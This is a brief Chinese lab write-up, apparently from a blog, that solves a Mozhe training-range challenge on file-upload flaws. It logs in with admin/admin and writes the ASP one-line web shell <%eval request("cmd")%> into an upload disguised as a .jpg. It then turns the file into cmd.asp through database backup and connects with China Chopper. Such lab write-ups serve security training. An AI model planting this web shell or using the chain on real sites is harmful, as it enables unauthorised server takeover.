墨者学院-WebShell文件上传漏洞分析溯源(第5题)

靶场地址:
https://www.mozhe.cn/bug/detail/OGp3KzRZUFpnVUNUZm9xcjJlN1V4dz09bW96aGUmozhe

后台登录页面路径/admin/login.asp,尝试弱口令登录,admin/admin成功登录


点击文件管理-管理文章-随机选择一篇编辑,写入asp一句话木马<%eval request("cmd")%>,保存文件后缀为jpg,上传,记录上传路径

点击数据处理-数据备份,通过数据库备份来写入一句话木马,备份我们的图片,备份数据库名称为cmd.asp



接着上菜刀找key即可


©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容